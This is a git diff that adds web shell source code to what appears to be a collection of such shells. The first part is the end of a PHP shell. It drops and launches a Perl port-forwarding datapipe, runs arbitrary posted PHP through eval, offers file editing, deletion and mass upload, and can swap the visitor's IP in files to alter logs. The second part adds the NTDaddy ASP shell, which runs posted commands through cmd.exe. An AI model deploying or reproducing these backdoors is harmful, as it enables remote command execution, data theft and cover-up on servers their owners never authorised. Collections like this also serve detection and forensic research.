+                        print \"Child: Îòïğàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/138shell/N/ntdaddy.asp.txt b/138shell/N/ntdaddy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/138shell/N/ntdaddy.asp.txt
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
